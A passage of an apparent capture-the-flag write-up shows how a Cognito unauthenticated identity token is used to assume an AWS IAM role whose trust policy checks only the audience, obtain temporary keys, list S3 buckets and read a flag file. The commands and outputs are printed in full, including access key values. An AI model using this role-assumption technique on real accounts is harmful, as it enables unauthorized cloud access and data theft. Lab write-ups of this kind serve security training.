"Token": "eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6ODUxY2I1MjQtMGMyMy00Y2ZiLWEwODEtODhmMzc4YTdmZmQ4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2OTUxOTIzMjMsImlhdCI6MTY5NTE5MTcyM30.KIgp8NVKXqfsnjHz71kIXjZHhmujj6pbypHf_I9YGelfSIozCeuEPxPHDUYg-t0klT-It9mJ3xQ49k3nsJPkBJj4NYR6FZn1u-d5pWcEK39VNI0Auk7E7WI4pX4IAEpXqm3fiwVHIPRGrkTTqzQDWwNdjyywkNWUaHp3ocoXucsNndsmUeTQxtn5QtuWowq2TRuKPJwch5y_IX_10hyLAexnkKZucHY8WgAug61zxImdWV21hvCrw6O6RuBrNzJ3f9W_zu3XGLPGC8pUauFTO_Rm5b6XAiQtUENHl6u08pTpMjJEjV28KDEDkHh2ZKzcOMEybktUuIU_qGwvdzEbgQ"
}
# assume the authenticated role with that token; the trust policy only checks aud
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name CognitoIdentityCredentials --web-identity-token eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6ODUxY2I1MjQtMGMyMy00Y2ZiLWEwODEtODhmMzc4YTdmZmQ4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2OTUxOTIzMjMsImlhdCI6MTY5NTE5MTcyM30.KIgp8NVKXqfsnjHz71kIXjZHhmujj6pbypHf_I9YGelfSIozCeuEPxPHDUYg-t0klT-It9mJ3xQ49k3nsJPkBJj4NYR6FZn1u-d5pWcEK39VNI0Auk7E7WI4pX4IAEpXqm3fiwVHIPRGrkTTqzQDWwNdjyywkNWUaHp3ocoXucsNndsmUeTQxtn5QtuWowq2TRuKPJwch5y_IX_10hyLAexnkKZucHY8WgAug61zxImdWV21hvCrw6O6RuBrNzJ3f9W_zu3XGLPGC8pUauFTO_Rm5b6XAiQtUENHl6u08pTpMjJEjV28KDEDkHh2ZKzcOMEybktUuIU_qGwvdzEbgQ
{
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXALOA2IQL",
"SecretAccessKey": "txLLiE0UH6O4H7rIqwKH5/YBCUUpIApTv3O0RSYg",
"SessionToken": "...",
"Expiration": "2023-09-20T07:38:04Z"
},
"SubjectFromWebIdentityToken": "us-east-1:851cb524-0c23-4cfb-a081-88f378a7ffd8",
"AssumedRoleUser": {
"AssumedRoleId": "AROARK7LBOHXASFTNOIZG:CognitoIdentityCredentials",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/CognitoIdentityCredentials"
},
"Provider": "cognito-identity.amazonaws.com",
"Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
```
```
$ aws configure set AWS_ACCESS_KEY_ID ASIARK7LBOHXALOA2IQL
$ aws configure set AWS_SECRET_ACCESS_KEY txLLiE0UH6O4H7rIqwKH5/YBCUUpIApTv3O0RSYg
$ aws configure set AWS_SESSION_TOKEN ...
$ aws configure set AWS_DEFAULT_REGION us-east-1
$ aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXASFTNOIZG:CognitoIdentityCredentials",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/CognitoIdentityCredentials"
}
$ aws s3 ls
2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 21:28:31 wiz-privatefiles
2023-06-05 21:28:31 wiz-privatefiles-x1000
$ aws s3 ls wiz-privatefiles-x1000
2023-06-06 03:42:27 4220 cognito2.png
2023-06-05 21:28:35 40 flag2.txt
$ aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt -
{wiz:open-sesame-or-shell-i-say-openid}
```
Flag: {wiz:open-sesame-or-shell-i-say-openid}